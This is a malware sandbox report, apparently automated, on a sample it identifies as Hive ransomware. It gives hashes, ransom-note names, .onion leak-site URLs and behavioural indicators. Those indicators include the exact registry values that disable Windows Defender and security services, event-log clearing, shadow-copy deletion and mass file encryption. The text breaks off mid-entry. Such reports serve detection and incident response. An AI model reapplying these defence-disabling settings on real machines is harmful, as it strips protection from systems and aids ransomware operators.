Analysis
-
max time kernel
141s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 21:29
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe
Resource
win10v2004-20250313-en
General
-
Target
2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe
-
Size
3.2MB
-
MD5
73b68282286d7613e433b562a9104438
-
SHA1
d1900a5700d8ba39c741e26d6e80baec350bce19
-
SHA256
2deb0a4080073f15b2634309ed46e5e57474c52df92f00f81e439764a61c5e7b
-
SHA512
f3d46b1b0f4ad48ba44b506703382133218ca8a259429483cd72bdc4498ee3bc3e610220373325c7dafab1e3a79ba5bfd13d12879faa74663171e4d40f4b241a
-
SSDEEP
24576:BUdmG2CcX1qgUVAEmLkcXnLyKEYDCLbteVY3In1vE5iWXkBiVwMEfQDFo9VarcXf:BttVc2/nDF50Ou9C60FRlZ31D14n
Malware Config
Extracted
C:\Program Files\7-Zip\Lang\kKwV_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Disables service(s) 3 TTPs
-
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 5632 wevtutil.exe 4468 wevtutil.exe 4504 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 6136 powershell.exe 5988 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\PlaceholderCollectionHero.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailSmallTile.scale-150.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-150.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-4x.png.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_vqCs_xfQ0fY0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_o1F-4njmwIw0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_fkNFOWsiZyM0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msaddsr.dll.mui 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\en-US\MSFT_PackageManagementSource.strings.psd1.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_7U_Cb7XrGCI0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-colorize.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\LargeTile.scale-100.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_pBNStes39MM0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\content-types.properties.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_ucw3qRF1i-I0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ul-oob.xrm-ms.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_hgYecUXXoGE0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-24_contrast-white.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_hU4EmFzeh-U0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Yahoo-Light.scale-300.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_GxVF27_rxDs0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-80_altform-unplated.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail-Dark.scale-150.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_3vCrkKJ1IYA0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-pl.xrm-ms.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_hE0aWOJ9iC80.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCacheMini.scale-100.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_ZxpCrfBEjqI0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_hqLBvJauM6o0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Windows Media Player\en-US\WMPMediaSharing.dll.mui 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_8QizJst_KMM0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\it-IT\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\QUAD.ELM.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_Qr7VyjYfy5U0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xee27.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_TyxgSfs_56o0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-40_altform-unplated.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-72_altform-unplated.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Dark.scale-125.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_FodLXTbOFDw0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Common Files\System\ado\msador28.tlb 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\freebxml.md.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_IivGBMB9on80.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_KrrRZa2NL6E0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\ja-JP\MSFT_PackageManagementSource.schema.mfl.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_DaA7tjgpm5Q0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\tr-tr\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-black_scale-200.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageSplashScreen.scale-150.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\SplashWideTile.scale-200_contrast-black.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-100_contrast-black.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_BCoIUj7t9rI0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_IoCDdBm4ins0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\kKwV_HOW_TO_DECRYPT.txt 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_R0_-0vwZsRo0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-125.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSplashScreen.contrast-white_scale-125.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeBGTaskHelper.winmd 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-200_contrast-black.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-disabled_32.svg.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_C5kcvXMF6Qw0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\selector.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_shxuUg6UTAw0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\ui-strings.js.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_DtM63TLYP3w0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS.EnLZ68wCHUuxShrlGeCKEKyWf5vs8vlalexL4NmrS2n_BPOIEofL00Q0.rvqwj 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\WideTile.scale-200_contrast-black.png 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4896 sc.exe 3152 sc.exe 4508 sc.exe 5144 sc.exe 2592 sc.exe 5408 sc.exe 6072 sc.exe 4516 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-31_73b68282286d7613e433b562a9104438_cobalt-strike_frostygoop_hive_sliver_snatch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened 